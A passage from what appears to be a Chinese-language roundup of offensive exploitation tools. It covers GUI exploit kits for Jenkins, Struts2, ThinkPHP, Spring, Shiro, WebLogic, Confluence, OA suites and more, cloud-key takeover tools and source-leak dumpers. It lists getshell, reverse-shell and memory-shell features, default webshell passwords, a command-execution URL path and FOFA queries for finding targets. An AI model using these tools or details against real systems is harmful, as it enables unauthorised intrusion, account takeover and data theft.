415 | [非必须] 指定请求超时时长,默认为5秒
416 | -f FILE, --file FILE [非必须] 指定payload(文本路径),默认为template/fastjson.txt
417 | -t TYPE, --type TYPE [非必须] 指定请求类型为get或post,默认为post
418 | -c COOKIE, --cookie COOKIE
419 | [非必须] 设置cookie值,默认为空
420 | -l LDAP, --ldap LDAP [可选] 指定ldap地址,ip:端口/路径 或 域名:端口/路径
421 | -r RMI, --rmi RMI [可选] 指定rmi地址,ip:端口 或 域名:端口
422 | -pro PROTOCOL, --protocol PROTOCOL
423 | [可选] 指定请求包的协议类型,需结合-req参数使用,默认为http
424 | -proxy PROXY, --proxy PROXY
425 | [可选] 设置代理,例:--proxy http://127.0.0.1:8080
426 | ```
427 |
428 | # Jenkins 综合漏洞利用工具
429 |
430 | ## 项目地址
431 |
432 | ```
433 | https://github.com/TheBeastofwar/JenkinsExploit-GUI
434 | ```
435 |
436 | ## 项目介绍
437 |
438 | ```
439 | 支持检测:
440 | CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1
441 | CVE-2016-0792 Jenkins XStream反序列化远程代码执行 https://github.com/jpiechowka/jenkins-cve-2016-0792
442 | CVE-2017-1000353 Jenkins-CI 远程代码执行漏洞 https://github.com/vulhub/CVE-2017-1000353
443 | CVE-2018-1000600 Jenkins GitHub SSRF+信息泄露
444 | CVE-2018-1000861 Jenkins 绕过Groovy沙盒未授权命令执行漏洞 https://github.com/orangetw/awesome-jenkins-rce-2019
445 | CVE-2018-1999002 Jenkins 任意文件读取 https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w
446 | CVE-2019-1003000 Jenkins 远程代码执行 https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
447 | CVE-2019-1003005/CVE-2019-1003029 远程代码执行(Script Security Plugin沙箱绕过) https://github.com/orangetw/awesome-jenkins-rce-2019
448 | CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897
449 | ```
450 |
451 | 
452 |
453 | # Struts2 全版本漏洞检测工具
454 |
455 | ## 项目地址
456 |
457 | ```
458 | https://github.com/abc123info/Struts2VulsScanTools
459 | ```
460 |
461 | ## 项目介绍
462 |
463 | ```
464 | 1、点击“检测漏洞”,会自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021、S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。
465 |
466 | 2、“批量验证”,(为防止批量geshell,此功能已经删除,并不再开发)。
467 |
468 | 3、S2-020、S2-021仅提供漏洞扫描功能,因漏洞利用exp很大几率造成网站访问异常,本程序暂不提供。
469 |
470 | 4、对于需要登录的页面,请勾选“设置全局Cookie值”,并填好相应的Cookie,程序每次发包都会带上Cookie。
471 |
472 | 5、作者对不同的struts2漏洞测试语句做了大量修改,执行命令、上传功能已经能通用。
473 |
474 | 6、支持GET、POST、UPLOAD三种请求方法,您可以自由选择。(UPLOAD为Multi-Part方式提交)
475 |
476 | 7、部分漏洞测试支持UTF-8、GB2312、GBK编码转换。
477 |
478 | 8、每次操作都启用一个线程,防止界面卡死。
479 | ```
480 |
481 | 
482 |
483 | # Thinkphp 综合漏洞利用工具
484 |
485 | ## 项目地址
486 |
487 | ```
488 | https://github.com/Lotus6/ThinkphpGUI
489 | ```
490 |
491 | ```
492 | https://github.com/bewhale/thinkphp_gui_tools
493 | ```
494 |
495 | ## 项目介绍
496 |
497 | ```
498 | Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
499 | 支持版本:(检查,命令执行,getshell)
500 | ThinkPHP 5.0 RCE
501 | ThinkPHP 5.0.10 RCE
502 | ThinkPHP 5.0.22/5.1.29 RCE
503 | ThinkPHP 5.0.23 RCE
504 | ThinkPHP 5.0.24-5.1.30 RCE
505 | ThinkPHP 3.x RCE
506 | ThinkPHP 5.x 数据库信息泄露
507 | ThinkPHP5.x日志泄露
508 | ThinkPHP3.x日志泄露
509 | ThinkPHP 3.x 日志包含RCE
510 | Thinkphp6.x日志泄漏
511 | ```
512 |
513 | 
514 |
515 | ```
516 | ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
517 | 支持大部分ThinkPHP漏洞检测,整合20多个payload
518 | 支持部分漏洞执行命令
519 | 支持单一漏洞批量检测
520 | 支持TP3和TP5自定义路径日志遍历
521 | 支持部分漏洞一键GetShell
522 | 支持设置代理和UA
523 | ```
524 |
525 | 
526 |
527 | # Spring 综合漏洞利用工具
528 |
529 | ## 项目地址
530 |
531 | ```
532 | https://github.com/charonlight/SpringExploitGUI
533 | ```
534 |
535 | ```
536 | https://github.com/0x727/SpringBootExploit
537 | ```
538 |
539 | ## 项目介绍
540 |
541 | ```
542 | 工具目前支持
543 | Spring Cloud Gateway RCE(CVE-2022-22947)
544 | Spring Cloud Function SpEL RCE (CVE-2022-22963)
545 | Spring Framework RCE (CVE-2022-22965)
546 | Spring Data Commons RCE (CVE-2018-1273)的检测以及利用
547 | 实现heapdump解密功能,并且支持模糊查询
548 | ```
549 |
550 | 
551 |
552 | ```
553 | SpringBootExploit
554 | 一款针对SpringBootEnv页面进行快速漏洞利用
555 | SnakeYAMLRCE
556 | SpELRCE
557 | EurekaXstreamRCE
558 | JolokiaLogbackRCE
559 | JolokiaRealmRCE
560 | H2DatabaseConsoleJNDIRCE
561 | SpringCloudGatewayRCE
562 | ```
563 |
564 | 
565 |
566 | # Shiro 反序列化漏洞综合利用工具
567 |
568 | ## 项目地址
569 |
570 | ```
571 | https://github.com/SummerSec/ShiroAttack2
572 | ```
573 |
574 | ```
575 | https://github.com/sma11new/Pyke-Shiro
576 | ```
577 |
578 | ## 项目介绍
579 |
580 | ```
581 | ShiroAttack2shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack
582 | javafx
583 | 处理没有第三方依赖的情况
584 | 支持多版本CommonsBeanutils的gadget
585 | 支持内存马
586 | 采用直接回显执行命令
587 | 添加了更多的CommonsBeanutils版本gadget
588 | 支持修改rememberMe关键词
589 | 支持直接爆破利用gadget和key
590 | 支持代理
591 | 添加修改shirokey功能(使用内存马的方式)可能导致业务异常
592 | 支持内存马小马
593 | 添加DFS算法回显(AllECHO)
594 | 支持自定义请求头,格式:abc:123&&&test:123
595 | ```
596 |
597 | 
598 |
599 | ```
600 | Pyke-Shiro:复杂请求下的Shiro反序列化利用工具
601 | 复杂请求可以是GET或POST,所有请求信息会被携带,可指定https,同时可选择是否保留原始数据包中的Cookie内容
602 | 假设前台输入的cookieFlag是rememberMe
603 |
604 | 复杂请求下如果勾选保留Cookie,两种情况:
605 | 一、请求包中有cookie,两种情况:
606 | 1、原始cookie内容中包含rememberMe,两种情况:
607 | a)原始cookie只有rememberMe一项,则无需保留,直接返回cookie payload
608 | b)原始cookie除了rememberMe还有其他项,则需要保留其它项,添加rememberMe的值为cookie payload
609 | 2、原始cookie中不包含rememberMe,直接拼接cookie payload即可
610 | 二、请求包中没cookie,不存在需要保留的内容,直接返回cookie payload
611 | ```
612 |
613 | 
614 |
615 | # 若依 RuoYi 综合漏洞利用工具
616 |
617 | ## 项目地址
618 |
619 | ```
620 | Ruoyi-All-1.0-SNAPSHOT这个工具是一个大佬写的没放github上,需要的可以去原作者公众号:小黑说安全,获取
621 | https://mp.weixin.qq.com/s/HU1OqZ7YFGjfc4HE3M8tPA
622 | ```
623 |
624 | ```
625 | https://github.com/charonlight/RuoYiExploitGUI
626 | ```
627 |
628 | ## 项目介绍
629 |
630 | 
631 |
632 | ```
633 | RuoYiExploitGUI_v1.0
634 | 若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具, 扫描和漏洞利用结束会自行删除所创建的定时任务。
635 | ```
636 |
637 | 
638 |
639 | # Xxl-job漏洞利用工具
640 |
641 | ## 项目地址
642 |
643 | ```
644 | https://github.com/charonlight/xxl-jobExploitGUI
645 | ```
646 |
647 | ## 项目介绍
648 |
649 | ```
650 | 工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。
651 | ```
652 |
653 | 
654 |
655 | # Jboss 综合漏洞利用工具
656 |
657 | ## 项目地址
658 |
659 | ```
660 | jbosss综合利用工具by:小黑
661 | 同样与上面Ruoyi-All-1.0-SNAPSHOT RuoYi综合漏洞利用工具出自同一个作者
662 | https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ
663 | ```
664 |
665 | ```
666 | https://github.com/fupinglee/JavaTools/tree/master/JBoss
667 | ```
668 |
669 | ## 项目介绍
670 |
671 | 
672 |
673 | ```
674 | JBoss相关漏洞的验证工具,包括有CVE-2006-5750,CVE-2007-1036,CVE-2010-0738,CVE-2010-1871,CVE-2013-4810,CVE-2015-7501,CVE-2017-7504,CVE-2017-12149等漏洞。
675 |
676 | CVE-2010-1871,CVE-2013-4810,CVE-2015-7501,CVE-2017-7504,CVE-2017-12149可以执行命令。
677 | ```
678 |
679 | 
680 |
681 | # Weblogic 综合漏洞利用工具
682 |
683 | ## 项目地址
684 |
685 | ```
686 |
687 | https://github.com/KimJun1010/WeblogicTool
688 | ```
689 |
690 | ## 项目介绍
691 |
692 | ```
693 | WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等
694 | CVE-2023-21931(JNDI)
695 | CVE-2023-21839(JNDI)
696 | CVE-2020-2551(JRMP)
697 | CVE-2020-2551
698 | CVE-2020-2555
699 | CVE-2020-2883
700 | CVE-2020-14882 未授权访问
701 | CVE-2018-2894
702 | CVE-2018-2628(JRMP)
703 | CVE-2018-2893(JRMP)
704 | CVE-2018-3245(JRMP)
705 | CVE_2018_3252(JRMP)
706 | CVE_2018_3191
707 | CVE-2016-3510
708 | CVE-2016-0638
709 | CVE-2017-10271
710 | CVE-2017-3248(JRMP)
711 | CVE-2015-4852
712 | ......
713 | ```
714 |
715 | 
716 |
717 | # Tomcat 综合漏洞利用工具
718 |
719 | ## 项目地址
720 |
721 | ```
722 | https://github.com/tpt11fb/AttackTomcat
723 | ```
724 |
725 | ```
726 | https://github.com/errors11/TomcatVuln
727 | ```
728 |
729 | ## 项目介绍
730 |
731 | ```
732 | AttackTomcat
733 | 检测漏洞清单
734 | CVE-2017-12615 PUT文件上传漏洞 tomcat-pass-getshell 弱认证部署war包 弱口令爆破 CVE-2020-1938 Tomcat 文件读取/包含
735 | ```
736 |
737 | 
738 |
739 | 
740 |
741 | 
742 |
743 | # 帆软反序列化漏洞利用工具
744 |
745 | ## 项目地址
746 |
747 | ```
748 | https://github.com/yecp181/Frchannel
749 | ```
750 |
751 | ```
752 | https://github.com/BambiZombie/FrchannelPlus
753 | ```
754 |
755 | ## 项目介绍
756 |
757 | ```
758 | 1. 本工具仅用于本地模拟环境测试, 适用于FineBI
759 |
760 | 2. 漏洞路径: /webroot/decision/remote/design/channel
761 |
762 | 3. 本工具支持jackson、hibernate、cb反序列化链来进行回显与注入内存马
763 |
764 | 4. 利用DNSLOG功能时在输入命令处输入例如:blo6bz.dnslog.cn
765 | ```
766 |
767 |

768 |
769 | 
770 |
771 | ```
772 |
773 | 帆软bi反序列化漏洞利用工具PLUS,将原版的冰蝎内存马换成了哥斯拉,增加了suo5内存马
774 | ```
775 |
776 | 
777 |
778 | # 云资产 AK-SK 利用管理工具
779 |
780 | ## 项目地址
781 |
782 | ```
783 | https://github.com/dark-kingA/cloudTools
784 | ```
785 |
786 | ## 项目介绍
787 |
788 | ```
789 | 云资产管理工具 目前工具定位是云安全相关工具,目前是两个模块 云存储工具、云服务工具,
790 | 云存储工具主要是针对oss存储、查看、删除、上传、下载、预览等等
791 | 云服务工具主要是针对rds、服务器的管理,查看、执行命令、接管等等
792 |
793 | 阿里云:接管控制台、取消接管、Oss增删改查、远程命令执行回显、历史命令记录查看、子用户列表、云数据库管理、告警管理
794 | 腾讯云:接管控制台、取消接管、Oss增删改查、远程命令执行回显、子用户列表
795 | 华为云:接管控制台、取消接管、子用户列表
796 | ucloud:接管控制台、主机查询、子用户列表查看、主用户查看、订单查看
797 | AWS: 接管控制台、创建后门、子用户列表、策略列表 后门信息
798 | ```
799 |
800 | 
801 |
802 | # Confluence 综合漏洞利用工具
803 |
804 | ## 项目地址
805 |
806 | ```
807 | https://github.com/Lotus6/ConfluenceMemshell
808 | ```
809 |
810 | ## 项目介绍
811 |
812 | ```
813 | ConfluenceMemshell
814 | Confluence CVE 2021,2022,2023 利用工具,支持命令执行,哥斯拉,冰蝎 内存马注入
815 |
816 | 支持 Confluence 版本:CVE-2021-26084,CVE-2022-26134,CVE_2023_22515,CVE-2023-22527
817 | (如果对您有帮助,感觉不错的话,请您给个大大的 ⭐️❗️)
818 | 哥斯拉默认密码:pass ,默认key:key ,请求配置 - 协议头 需加上 Connection: close
819 | 冰蝎默认密码:rebeyond,默认UA:Accept-Language:zh-CN,zh;q=0.95,n-AS,fr-RF
820 | 只有 CVE-2022-26134 版本支持哥斯拉,冰蝎自定义密码,其他版本都是默认密码
821 | V1.1版本
822 |
823 | 新增 CVE_2023_22515,用户创建,内存马注入,基于 CmdShell 的命令执行
824 | table 双击复制当前行,shell路径,key,ua
825 | 哥斯拉 memshell 地址:url+/plugins/servlet/com/atlassian/TeamManageServlet
826 | 哥斯拉默认密码:pass ,默认key:key ,请求配置 - 协议头 需加上 Connection: close
827 | CmdShell 地址:url+/plugins/servlet/com/atlassian/TeamManageServlet?team=whoami
828 | ```
829 |
830 | 
831 |
832 | # 数据库综合利用工具
833 |
834 | ## 项目地址
835 |
836 | ```
837 | https://github.com/SafeGroceryStore/MDUT
838 | ```
839 |
840 | ```
841 | https://github.com/team-ide/teamide
842 | ```
843 |
844 | ## 项目介绍
845 |
846 | ```
847 | MDUT(Multiple Database Utilization Tools)是中国一款集成了多种主流数据库类型的跨平台数据库利用工具。
848 | 在前身SQLTOOLS的基础上,开发了该程序(向SQLTOOLS致敬),旨在将常见的数据库利用方法集成到一个程序中,打破了各种数据库利用工具需要各种环境并造成相当不便的障碍。
849 | 此外,该工具使用JAVAFx作为GUI操作界面,美观。
850 | 同时,该程序还支持多个数据库同时运行,每个数据库都是相互独立的,这极大地方便了网络安全工作者的使用。
851 | ```
852 |
853 | 
854 |
855 | ```
856 | Team IDE 集成MySql、Oracle、金仓、达梦、神通等数据库、SSH、FTP、Redis、Zookeeper、Kafka、Elasticsearch、Mongodb、小工具等管理工具
857 | Team · IDE 功能模块
858 | 终端
859 | 配置SSH连接,连接远程服务器 完成
860 | SSH支持rz、sz命令,rz支持批量上传 完成
861 | 支持本地终端 完成
862 | 支持节点终端 完成
863 | Zookeeper
864 | 支持单机、集群,增删改查等操作,批量删除等 完成
865 | Kafka
866 | 对Kafka主题增删改查等操作 完成
867 | 选择主题,推送、消费、删除数据等 完成
868 | Redis
869 | Redis Key搜索、模糊查询、删除、新增等 完成
870 | 字符串、哈希、列表、集合值编辑 完成
871 | Elasticsearch
872 | 索引增删改查等操作 完成
873 | 选择索引,增删改查数据等 完成
874 | 添加索引,设置字段,索引迁移等 完成
875 | Database
876 | 数据库库|用户|模式列表、表数据加载 完成
877 | 数据库库表数据增删改查、批量新增、修改、删除等操作 完成
878 | 表格选择数据导出SQL(新增、修改、删除数据SQL)等操作 完成
879 | 自定义SQL执行面板,结果查看器 完成
880 | 新建库,在线设计表,查看建表、更新表SQL语句 完成
881 | 支持数据库,MySql、Oracle、达梦、金仓、神通、Sqlite、ODBC等数据库 完成
882 | 节点
883 | 可以配置多服务器之间网络透传,内外网相互透传等 完成
884 | 小工具
885 | JSON、Yaml转换 完成
886 | 时间长转换 完成
887 | Base64、MD5等 完成
888 | 二维码生成 完成
889 | Thrift
890 | 添加thrift模块,配置thrift文件目录 完成
891 | 展示所有thrift服务、方法等 完成
892 | 双击方法运行测试 完成
893 | 性能测试,测试报告,图表展示TPS、AVG、Min、Max、T90、T99等 完成
894 | SSH隧道
895 | Mysql、Redis、Zookeeper支持SSH隧道连接,选择SSH后,填写127.0.0.1则连接到SSH本地相应资源 完成
896 | Mongodb
897 | 库管理 完成
898 | 集合管理 完成
899 | 集合索引编辑 完成
900 | 集合数据查询、新增、修改、删除 完成
901 | ```
902 |
903 | 
904 |
905 | # DecryptTools 综合加解密后渗透工具
906 |
907 | ## 项目地址
908 |
909 | ```
910 | https://github.com/wafinfo/DecryptTools
911 | ```
912 |
913 | ## 项目介绍
914 |
915 | ```
916 | DecryptTools综合解密
917 | 一款针对加解密综合利用后渗透工具
918 | 工具展示
919 | 支持22种加解密+密码查询功能
920 | 万户OA
921 | 用友NC
922 | 金蝶EAS
923 | 蓝凌OA
924 | 致远OA
925 | 宏景ERP
926 | 湖南强智
927 | 金和jc6 瑞友天翼
928 | 金和C6 Navicat
929 | 华天动力 FinalShell
930 | 亿赛通
931 | 帆软报表
932 | H3C CAS
933 | Weblogic
934 | 金蝶云星空
935 | 新华三IMC
936 | 金盘 OPAC
937 | 海康威视IVMS 8700
938 | 海康威视IP Camera
939 | 海康威视综合安防平台(iSecure) (支持全平台)
940 | JBOSS
941 | SpringEnc
942 | Druid
943 | 密码查询功能
944 | ```
945 |
946 | 
947 |
948 | # 互联网厂商 API 利用工具
949 |
950 | ## 项目地址
951 |
952 | ```
953 | https://github.com/pykiller/API-T00L
954 | ```
955 |
956 | ```
957 | https://github.com/mrknow001/API-Explorer
958 | ```
959 |
960 | ## 项目介绍
961 |
962 | ```
963 | 针对互联网各大API泄露的利用工具,包含钉钉、企业微信、飞书等
964 |
965 | ```
966 |
967 | 
968 |
969 | ```
970 | 工具初衷是做一个小程序、公众号、企业微信、飞书、钉钉等泄露secert后利用工具,后来发现几家接口有一定区别,认证等参数分布在不同位置,索性就做成一个比较通用的工具了。目前可以定义:请求类型、url、header、body、正则提取认证token、接口参数说明。
971 | API-Explorer是一款管理api接口的工具,可提前配置好接口,直接调用即可;可定义数据包任何位置内容,使用起来相当灵活。
972 |
973 | 应用 功能 数据库接口
974 | 微信公众号 支持 完成部分常用功能
975 | 微信小程序 支持 完成部分常用功能
976 | 企业微信 支持 完成部分常用功能
977 | 钉钉 理论支持 无
978 | 飞书 支持 完成部分常用功能
979 | 腾讯地图 支持 完成部分常用功能
980 | 高德地图 支持 完成部分常用功能
981 | 百度地图 支持 完成部分常用功能
982 | 钉钉无测试接口,写了也不知道效果,所以目前没有写。
983 | ```
984 |
985 | 
986 |
987 | # OA 综合漏洞利用工具
988 |
989 | ## 项目地址
990 |
991 | ```
992 | https://github.com/R4gd0ll/I-Wanna-Get-All
993 | ```
994 |
995 | ```
996 | https://github.com/achuna33/MYExploit
997 | ```
998 |
999 | ```
1000 | https://mp.weixin.qq.com/s/1MEkYv5A47DJLCKqXKT0zQ
1001 | ```
1002 |
1003 | ```
1004 | https://github.com/xiaokp7/TongdaOATool
1005 | ```
1006 |
1007 | ## 项目介绍
1008 |
1009 | ```
1010 | 介绍
1011 | 目前集成288漏洞,包括nday、1day(未公开poc)
1012 |
1013 | java环境 java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)
1014 |
1015 | 基于Apt-T00ls二次开发工具,I Wanna Get All 安全工具, 严禁一切未授权漏洞扫描攻击
1016 |
1017 | 使用工具或文章转发用于其他途径,请备注作者及工具地址来源。
1018 |
1019 | 使用工具前建议判断系统指纹框架,部分漏洞为接口探测存活判断是否成功,实际利用情况以执行情况为准
1020 | 1. 用友serial漏洞大部分为接口探测,请ATT根据实际情况进行判断
1021 | 2. 部分漏洞为确保准确性,请先进行检测,再进行点击执行利用
1022 | 3. 使用ALL进行漏洞探测时,由于多线程等其他原因会产生误报
1023 | 4. 文件上传漏洞,上传文件后执行进行上传,并使CMD栏为空,请先检测尝试上传后再利用
1024 | 5. 命令执行漏洞利用CMD写入命令后进行执行。
1025 | 6. 清屏按钮可清除除URL地址外所有信息
1026 | 7. 根据执行结果提示并选择其他模块利用
1027 | 8. POC模块目前集成poc情况共近230余个,包含至今HVV、goby纰漏漏洞(因poc集中管理可能出现误报,请配置代理抓包判断),如下:
1028 | (1).用友NC&反序列化接口----------------------------------fofa:title="YONYOU NC"
1029 | (2).用友GRP--------------------------------------------fofa:app="yonyou-GRP-U8"
1030 | (3).用友NCCloud----------------------------------------fofa:body="nccloud"
1031 | (4).用友tplus------------------------------------------fofa:app="畅捷通-TPlus"
1032 | (5).用友U8C--------------------------------------------fofa:app="用友-U8-Cloud"
1033 | (6).用友ufida------------------------------------------fofa:body="ufida.ico"
1034 | (7).泛微Ecology----------------------------------------fofa:app="泛微-协同办公OA"
1035 | (8).泛微Emobile----------------------------------------fofa:title="移动管理平台-企业管理"
1036 | (9).泛微Eoffice----------------------------------------fofa:app="泛微-EOffice"
1037 | (10).蓝凌OA--------------------------------------------fofa:app="Landray-OA系统"
1038 | (11).蓝凌EIS-------------------------------------------fofa:app="Landray-EIS智慧协同平台"
1039 | (12).万户OA--------------------------------------------fofa:body="/defaultroot/"
1040 | (13).致远A6A8------------------------------------------fofa:app="致远互联-OA"
1041 | (14).致远MServer---------------------------------------fofa:body="/mobile_portal/"
1042 | (15).致远yyoa------------------------------------------fofa:body="yyoa" && app="致远互联-OA"
1043 | (16).通达OA--------------------------------------------fofa:app="TDXK-通达OA"
1044 | (17).帆软组件-------------------------------------------fofa:"Powered by 帆软"
1045 | (18).金蝶Apusic----------------------------------------fofa:header="Apusic"
1046 | (19).金蝶EAS-------------------------------------------fofa:app="Kingdee-EAS"
1047 | (20).金蝶云OA------------------------------------------fofa:app="金蝶云星空-管理中心"
1048 | (21).金和OA--------------------------------------------fofa:app="金和网络-金和OA"
1049 | (22).红帆OA--------------------------------------------fofa:app="红帆-ioffice"
1050 | (23).宏景HCM--------------------------------------------fofa:app="HJSOFT-HCM"
1051 | (24).亿赛通---------------------------------------------fofa:app="亿赛通-电子文档安全管理系统"
1052 | (23).飞企互联-------------------------------------------fofa:app="FE-协作平台"
1053 |
1054 | MemShell模块
1055 | 1. 支持冰蝎3.0、哥斯拉、蚁剑、suo5、cmdecho、neoReGeorg、自定义内存马
1056 | 2. 支持输出源码、Base64、hex、gzip格式payload
1057 | 3. 用友NC反序列化 集成接口反序列化(测试环境)
1058 | 4. 用友U8C反序列化 集接口反序列化(测试环境)
1059 | 5. 亿赛通XStream反序列化 集接口反序列化(测试环境)
1060 | 6. 用友NC内存马支持bypass脏数据传入,默认为100字节
1061 | ```
1062 |
1063 | 
1064 |
1065 | 
1066 |
1067 | ```
1068 | 该工具获取请关注原作者公众号:琴音安全
1069 | ```
1070 |
1071 | 
1072 |
1073 | # 信息泄露利用工具
1074 |
1075 | ## Swagger API 信息泄露利用工具
1076 |
1077 | ### 项目地址
1078 |
1079 | ```
1080 | https://github.com/jayus0821/swagger-hack
1081 | ```
1082 |
1083 | ```
1084 | https://github.com/lijiejie/swagger-exp
1085 | ```
1086 |
1087 | ### 项目介绍
1088 |
1089 | ```
1090 | Swagger-hack 2.0
1091 | 自动化爬取并自动测试所有swagger接口
1092 | 第一个版本仅适配了一个版本的swagger,不同版本见差距比较大,后续又调查了很多版本的swagger,将脚本的适配性增强了很多
1093 |
1094 | 优化:
1095 |
1096 | 适配多个版本swagger
1097 | 添加多进程
1098 | 增强了程序的健壮性
1099 | 优化了控制台显示,生成日志文件
1100 | ```
1101 |
1102 | 
1103 |
1104 | ```
1105 | Swagger API Exploit 1.2
1106 | 这是一个 Swagger REST API 信息泄露利用工具。 主要功能有:
1107 |
1108 | 遍历所有API接口,自动填充参数
1109 | 尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接口是否可以未授权访问利用
1110 | 分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞
1111 | 检测 API认证绕过漏洞
1112 | 在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用
1113 | 使用Chrome打开本地Web服务器,并禁用CORS,解决部分API接口无法跨域请求的问题
1114 | 当工具检测到HTTP认证绕过漏洞时,本地服务器拦截API文档,修改path,以便直接在Swagger UI中进行测试
1115 | ```
1116 |
1117 | 
1118 |
1119 | ## Heapdump敏感信息提取工具
1120 |
1121 | ### 项目地址
1122 |
1123 | ```
1124 | https://github.com/whwlsfb/JDumpSpider
1125 | ```
1126 |
1127 | ```
1128 | https://github.com/wyzxxz/heapdump_tool
1129 | ```
1130 |
1131 | ### 项目介绍
1132 |
1133 | ```
1134 | JDumpSpider
1135 | HeapDump敏感信息提取工具
1136 | 暂支持提取以下类型的敏感信息
1137 |
1138 | 数据源
1139 | SpringDataSourceProperties
1140 | WeblogicDataSourceConnectionPoolConfig
1141 | MongoClient
1142 | AliDruidDataSourceWrapper
1143 | HikariDataSource
1144 | 配置文件信息
1145 | MapPropertySource
1146 | OriginTrackedMapPropertySource
1147 | MutablePropertySource
1148 | ConsulPropertySource
1149 | OSS(模糊搜索)
1150 | Redis配置
1151 | RedisStandaloneConfiguration
1152 | JedisClient
1153 | ShiroKey
1154 | CookieRememberMeManager
1155 | 模糊搜索用户信息
1156 | UserPassSearcher01
1157 |
1158 |
1159 | $ java -jar .\target\JDumpSpider-1.0-SNAPSHOT-full.jar
1160 | Missing required parameter: ''
1161 | Usage: JDumpSpider [-hV]
1162 | Extract sensitive information from heapdump file.
1163 | Heap file path.
1164 | -h, --help Show this help message and exit.
1165 | -V, --version Print version information and exit.
1166 |
1167 | ```
1168 |
1169 | ## .git 泄漏利用工具
1170 |
1171 | ### 项目地址
1172 |
1173 | ```
1174 | https://github.com/BugScanTeam/GitHack
1175 | ```
1176 |
1177 | ### 项目介绍
1178 |
1179 | ```
1180 | GitHack
1181 | .git 泄漏利用工具,可还原历史版本
1182 |
1183 | 依赖
1184 | 不需要安装其它 Python 库,只需要有 git 命令
1185 |
1186 | git
1187 | ubuntu/debian: $ apt-get install git
1188 | redhat/centos: $ yum install git
1189 | windows git-for-windows下载
1190 | 使用前需确保 git 在 环境变量中
1191 |
1192 | 使用方法
1193 | python GitHack.py http://www.example.com/.git/
1194 | 还原后的文件在 dist/ 目录下
1195 |
1196 | 工作流程
1197 | 尝试获取 packs克隆
1198 | 尝试目录遍历克隆
1199 | 尝试从缓存文件(index)、commit记录中恢复
1200 | ```
1201 |
1202 | ## SVN源代码利用工具
1203 |
1204 | ### 项目地址
1205 |
1206 | ```
1207 | https://github.com/admintony/svnExploit
1208 | ```
1209 |
1210 | ### 项目介绍
1211 |
1212 | ```
1213 | SvnExploit是一款SVN源代码利用工具,其完美支持SVN<1.7版本和SVN>1.7版本的SVN源代码泄露
1214 |
1215 | python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/
1216 | ____ _____ _ _ _
1217 | / ___|_ ___ __ | ____|_ ___ __ | | ___ (_) |_
1218 | \___ \ \ / / '_ \| _| \ \/ / '_ \| |/ _ \| | __|
1219 | ___) \ V /| | | | |___ > <| |_) | | (_) | | |_
1220 | |____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__|
1221 | |_|
1222 | SvnExploit - Dump the source code by svn
1223 | Author: AdminTony (http://admintony.com)
1224 | https://github.com/admintony/svnExploit
1225 |
1226 |
1227 | +--------------------+----------+------------------------------------------------+
1228 | | 文件名 | 文件类型 | CheckSum |
1229 | +--------------------+----------+------------------------------------------------+
1230 | | conn.php | file | $sha1$8f47ccbd4a436aa4f31018fea026275f6059ed10 |
1231 | | trunk | dir | None |
1232 | | branches | dir | None |
1233 | | admin_login.php | file | $sha1$a6981b1ca963c8a75e133e38780be7ff0cd60952 |
1234 | | phpmyadmin | file | $sha1$6d5af41c175e344ee483732648edc9318b2a6014 |
1235 | | README.TXT | file | $sha1$c5981462cc06422f4a78e68f0a48dddcf5860eb9 |
1236 | | README.txt | file | $sha1$ef4b5f3081dbac31f9fb089aafd60dd2b9474b51 |
1237 | | secret.php | file | $sha1$2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609 |
1238 | | README.md | file | $sha1$466f5ab1e4adfd373a23f639e0dd8fcfdce7874b |
1239 | | img/login_bg01.jpg | file | $sha1$311efc58c4d7035a54fdb8e94d6ba901c56354fd |
1240 | | img | dir | None |
1241 | | index.php | file | $sha1$4660847a73ab0906d91841dde9576bd5054b2020 |
1242 | | test.sql | file | $sha1$096a90da3e471a472874413b18cb2f5dd0567fd1 |
1243 | | admin.php | file | $sha1$f444d3aad996577872ac7b95a2c05aa11e6b1f8f |
1244 | | document | dir | None |
1245 | | tags | dir | None |
1246 | +--------------------+----------+------------------------------------------------+
1247 | ```
1248 |
1249 | ## .DS_Store文件泄露利用工具
1250 |
1251 | ### 项目地址
1252 |
1253 | ```
1254 | https://github.com/lijiejie/ds_store_exp
1255 | ```
1256 |
1257 | ### 项目介绍
1258 |
1259 | ```
1260 | ds_store_exp
1261 | .DS_Store文件泄露漏洞。
1262 |
1263 | 它解析.DS_Store文件并以递归方式下载文件。
1264 |
1265 | 这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。
1266 | ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store
1267 |
1268 | hd.zj.qq.com/
1269 | └── themes
1270 | └── galaxyw
1271 | ├── app
1272 | │ └── css
1273 | │ └── style.min.css
1274 | ├── cityData.min.js
1275 | ├── images
1276 | │ └── img
1277 | │ ├── bg-hd.png
1278 | │ ├── bg-item-activity.png
1279 | │ ├── bg-masker-pop.png
1280 | │ ├── btn-bm.png
1281 | │ ├── btn-login-qq.png
